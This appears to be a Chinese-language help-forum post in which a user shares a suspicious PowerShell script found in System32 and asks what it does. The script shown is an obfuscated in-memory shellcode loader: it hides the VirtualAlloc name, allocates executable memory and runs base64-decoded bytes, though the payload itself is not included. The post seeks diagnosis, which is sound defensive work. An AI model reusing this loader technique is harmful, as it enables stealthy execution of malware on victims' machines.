我通过 procexp 跟踪进程的命令行参数找到了这个脚本。它位于 C:\Windows\System32\8208c741-a361-4e21-83e2-6d7f9a3b5b89.ps1 并以某种方式定期运行自己(不知道如何,我不熟悉 PS)。
脚本的最开始包含一些非常长的字符串,前面带有
$dat +=
,可以在 this Pastebin 中看到。
$assemblies = New-Object -TypeName System.Collections.Generic.Dictionary'[string, System.Reflection.Assembly]' -ArgumentList ([StringComparer]::OrdinalIgnoreCase)
foreach ($assembly in ([AppDomain]::CurrentDomain.GetAssemblies())) {
$assemblies[[System.IO.Path]::GetFileName($assembly.Location)] = $assembly;
}
function Get-Ptr {
param (
[IntPtr]
$ptr,
[type[]]
$params,
[type]
$rettype
)
$bu = [AppDomain]::CurrentDomain.DefineDynamicAssembly([System.Reflection.AssemblyName]::new(('_' + [guid]::NewGuid().ToString())), [System.Reflection.Emit.AssemblyBuilderAccess]::Run).DefineDynamicModule(('_' + [guid]::NewGuid().ToString()), $false).DefineType(('_' + [guid]::NewGuid().ToString()), 'Class, Public, Sealed, AnsiClass, AutoClass', [System.MulticastDelegate]);
$bu.DefineConstructor('RTSpecialName, HideBySig, Public', [System.Reflection.CallingConventions]::Standard, $params).SetImplementationFlags('Runtime, Managed');
$bu.DefineMethod('Invoke', 'Public, HideBySig, NewSlot, Virtual', $rettype, $params).SetImplementationFlags('Runtime, Managed');
$del = $bu.CreateType();
return [System.Runtime.InteropServices.Marshal]::GetDelegateForFunctionPointer($ptr, $del);
}
function Get-Func {
param (
[string]
$module,
[string]
$name,
[type[]]
$params,
[type]
$rettype
)
$na = $assemblies['System.dll'].GetType(('Microsoft' + '.Win32.' + 'UnsafeN' + 'ativeMethods'));
$gp = $na.GetMethod('GetProcAddress', [Type[]] @('System.Runtime.InteropServices.HandleRef', 'string'));
$md = $na.GetMethod('GetModuleHandle').Invoke($null, @($module));
$ptr = $gp.Invoke($null, @(([System.Runtime.InteropServices.HandleRef]::new([object]::new(), $md)), $name));
return Get-Ptr $ptr $params $rettype;
}
$fname = 'V';
$fname += 'i';
$fname += 'r';
$fname += 't';
$fname += 'u';
$fname += 'a';
$fname += 'l';
$fname += 'A';
$fname += 'l';
$fname += 'l';
$fname += 'o';
$fname += 'c';
$func = Get-Func 'Kernel32.dll' $fname @([IntPtr], [IntPtr], [uint32], [uint32]) ([IntPtr]);
$dat = [Convert]::FromBase64String($dat);
$patch = $func.Invoke(0, 8208, 12288, 64);
[Runtime.InteropServices.Marshal]::Copy($dat, 0, $patch, 8208);
$patchfunc = Get-Ptr $patch @([uint32], [IntPtr], [IntPtr], [IntPtr]) ([IntPtr]);
$patch2 = [Runtime.InteropServices.Marshal]::AllocHGlobal(95232);
[Runtime.InteropServices.Marshal]::Copy($dat, 8208, $patch2, 95232);
$patchfunc.Invoke(0, $patch2, 1, 0);
while($true)
{
Start-Sleep 10
}
运行后,它似乎以某种方式与 System32\drivers\VwA5N1xq4w 和 System32\drivers mscxjme2 下的 .sys 文件进行交互;
所有这些文件都包含一长串像这样的行:
08/23/2021 00:24:32.582 [506]: Failed to load dependency Microsoft.AnalysisServices.AdomdClient of assembly Microsoft.ReportingServices.DataExtensions, Version=2020.13.0.0, Culture=neutral, PublicKeyToken=89845dcd8080cc91 because of the following error : Die gefundene Manifestdefinition der Assembly stimmt nicht mit dem Assemblyverweis überein. (Ausnahme von HRESULT: 0x80131040
08/23/2021 00:24:32.582 [507]: Failed to load dependency Microsoft.AnalysisServices.AdomdClient of assembly Microsoft.ReportingServices.DataExtensions, Version=2020.13.0.0, Culture=neutral, PublicKeyToken=89845dcd8080cc91 because of the following error : Die gefundene Manifestdefinition der Assembly stimmt nicht mit dem Assemblyverweis überein. (Ausnahme von HRESULT: 0x80131040
该脚本似乎有特定目的,其行为可能是较大系统或恶意软件的一部分。 尝试运行防病毒扫描。